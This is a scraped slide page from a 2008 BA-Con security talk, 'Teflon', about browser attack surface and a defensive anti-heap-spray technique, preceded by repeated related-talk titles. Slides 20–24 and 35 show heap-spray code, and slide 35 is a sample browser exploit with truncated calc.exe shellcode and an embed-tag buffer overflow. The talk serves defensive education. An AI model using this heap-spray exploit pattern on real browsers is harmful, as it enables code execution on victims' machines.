ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 

Más de Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Teflon - Anti Stick for the browser attack surface

  • 1. Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface BA-Con 2008 – Buenos Aires
  • 2.
  • 3.
  • 5. Browser Architecture DOM HTML+CSS Javascript
  • 6. Browser Architecture DOM HTML+CSS Javascript user loaded content <img> <iframe> <script> <object> <div> <style> <embed> <span> <table> <form> <input> ... etc.
  • 7. Browser Architecture DOM HTML+CSS Javascript user loaded content <img> <iframe> <script> <object> <div> <style> <embed> <span> <table> <form> <input> ... etc. Ajax libs Ajax/rich apps
  • 8. The Browser is Desktop 2.0 &quot;Same Same But Different&quot;
  • 9. The Browser – Kernel analogy DOM HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps Kernel System Call libs Userland programs LibC C Runtime Browser OS =
  • 10. The Browser – Kernel analogy HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps System Call libs Userland programs LibC C Runtime Browser Core Kernel DOM Kernel =
  • 11. The Browser – Kernel analogy DOM HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps Kernel System Call libs Userland programs LibC C Runtime Plugin / Extensions Drivers =
  • 12. The Browser – Kernel analogy DOM HTML+CSS Javascript Ajax libs Ajax/rich apps Kernel System Call libs LibC C Runtime HTML / DHTML / JS Userland code <H1>hello world</H1> <script>alert('hi');</script> printf(&quot;Hello World&quot;); =
  • 13. The Browser – Kernel analogy DOM Ajax libs Ajax/rich apps Kernel LibC C Runtime <object>, <embed> syscalls <object clsid=&quot;XX-YYY-ZZ&quot;> <embed src=&quot;file.mp4&quot;> System Call libs exec(&quot;program.bin&quot;); open(&quot;file.mp4&quot;); =
  • 14. The Browser – Kernel analogy DOM Ajax libs Ajax/rich apps Kernel LibC C Runtime XHR Sockets xhr = new XMLHttpRequest() System Call libs s = socket(); =
  • 15. Browser &quot;syscalls&quot; HTML Loaded DOM Javascript HTML
  • 16. Browser &quot;syscalls&quot; HTML document.write(&quot;<object CLSID=XXX-XXXX-XXX>&quot;); DOM Javascript
  • 17. Browser &quot;syscalls&quot; document.write(&quot;<object CLSID=XXX-XXXX-XXX>&quot;); Javascript HTML DOM
  • 18.
  • 19.
  • 20. Heap Spraying NOP sled shellcode NOP sled shellcode NOP sled shellcode <script> : spray = build_large_nopsled(); a = new Array(); for(i = 0; i < 100; i++) a[i] = spray + shellcode; : </script> <html> : exploit trigger condition goes here : </html> a[7] a[8] a[9]
  • 21. How it all works stack heap code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP frames on the stack var1 var3 var2 var4 overflow in var 3
  • 22. The Heap...sprayed stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 overflow in var 3 <script> : for(i = 0; i < 50; i++) a[i] = nops + shellcode; : </script> part of the heap gets &quot;sprayed&quot;
  • 23. Return to Heap stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 overwrite saved EIP AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr <object clsid=XXXXXXXX> exploit trigger in HTML code
  • 24. Return to Heap stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr Hit one of the many sprayed blocks.
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35. Plain vanilla exploit <script> // calc.exe var shellcode = unescape(&quot;%ue8fc%u0044%u0000%u458b....... ......%u6c61%u2e63%u7865%u2065%u0000&quot;); // heap spray var spray = unescape(&quot;%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090&quot;); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; // we need approx 2200 A's to blow the buffer buf = &quot;&quot;; for(i = 0; i < 550; i++) buf += unescape(&quot;%05%05%05%05&quot;); buf += &quot;.wmv&quot;; document.write('<embed src=&quot;' + buf + '&quot;></embed>'); </script>
  • 38.
  • 39.
  • 42. With Teflon – harmless div
  • 43. With Teflon – harmless div
  • 44.
  • 45.
  • 46.
  • 47.
  • 48. [email_address] Thank you BA-Con 2008 – Buenos Aires